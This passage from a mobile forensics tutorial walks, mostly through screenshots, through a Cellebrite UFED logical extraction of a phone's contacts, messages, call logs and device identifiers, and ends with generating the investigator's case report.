![[Image: 9.1.jpg?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-xVLggDlI-iE/WOUIUXHQaCI/AAAAAAAAPuY/uxB54GpI-m8F-vw6zlr31CfosTX6ROm2QCLcB/s1600/9.1.jpg?w=687&ssl=1)
From the Contacts account we extracted contacts from Gmail, Face book messenger and Whatsapp as displayed below.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-07UU_2mEkTY/WOUIUiB8VFI/AAAAAAAAPuc/Jv22QhEaSusQy4ctZzO3j1CQHkEHO8EcwCLcB/s1600/9.png?w=687&ssl=1)
The Cellebrite software provides the investigator with source instructions to proceed further on the case by just clicking on the ‘How to?’
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-9OExi4bOvuE/WOUISO3SZII/AAAAAAAAPto/-iR-GrLtCwEt828v9oP43hfKWL27FQB1ACLcB/s1600/10.png?w=687&ssl=1)
The Logical Phone Extraction was completed successfully. The details of the number of information gathered from Phonebook, SMS, and Call Logs from the mobile under forensic investigation is highlighted.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-njY3XzDsFio/WOUISlytM_I/AAAAAAAAPtw/RTz6VZSXqtk4JQf1r0rwgk2zHJDsgpsmQCLcB/s1600/11.png?w=687&ssl=1)
The software displays another pop up ‘PA Evidence Collection.ufdx’ along with the Logical 01 folder for the investigator
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-jDGYzJBnBVg/WOUISi1lnjI/AAAAAAAAPt0/aSHFnLzCYqcWTkZsupj6bsWeQdxWE6-7gCLcB/s1600/12.png?w=687&ssl=1)
The UFED Physical Analyzer report of the mobile phone was captured by Cellebrite. The analyser captured content of the mobile model information ranging from the model name, IMEI, ICCID, MSISDN, IMSI to name a few.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-oXfTnPu8WQA/WOUIS-g4sfI/AAAAAAAAPt4/9UoXbGa_m9ckLn1tGMglEGEn6GRKvPagwCLcB/s1600/13.png?w=687&ssl=1)
Before making the final report, a case management form needs to be filled up by the investigator which provides –the case number, name, evidence number, examiner name, department, location, notes, name of the report, document details, project name as well as format. The report will be submitted in PDF or word or any other format. The final report is generated by pressing Next command.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-Yh3LTDefDjU/WOUITPrknDI/AAAAAAAAPt8/Gi6gHO-NLhgB3FSEsGiO1DhVdkXoGPdsACLcB/s1600/14.png?w=687&ssl=1)
Summary of the Cellebrite UFED report on mobile under forensic investigation.
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-cjP7Zhtal5g/WOUITMrdcQI/AAAAAAAAPuA/E9WM730z0RkSswI7gzQV1kNlt0_FzX-gwCLcB/s1600/15.png?w=687&ssl=1)
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-_DN9I4Mbxuw/WOUKEa5vVyI/AAAAAAAAPuk/4YcS-K-8SZkb9P_FcJuRaXJm_vzrWT50gCLcB/s1600/16.png?w=687&ssl=1)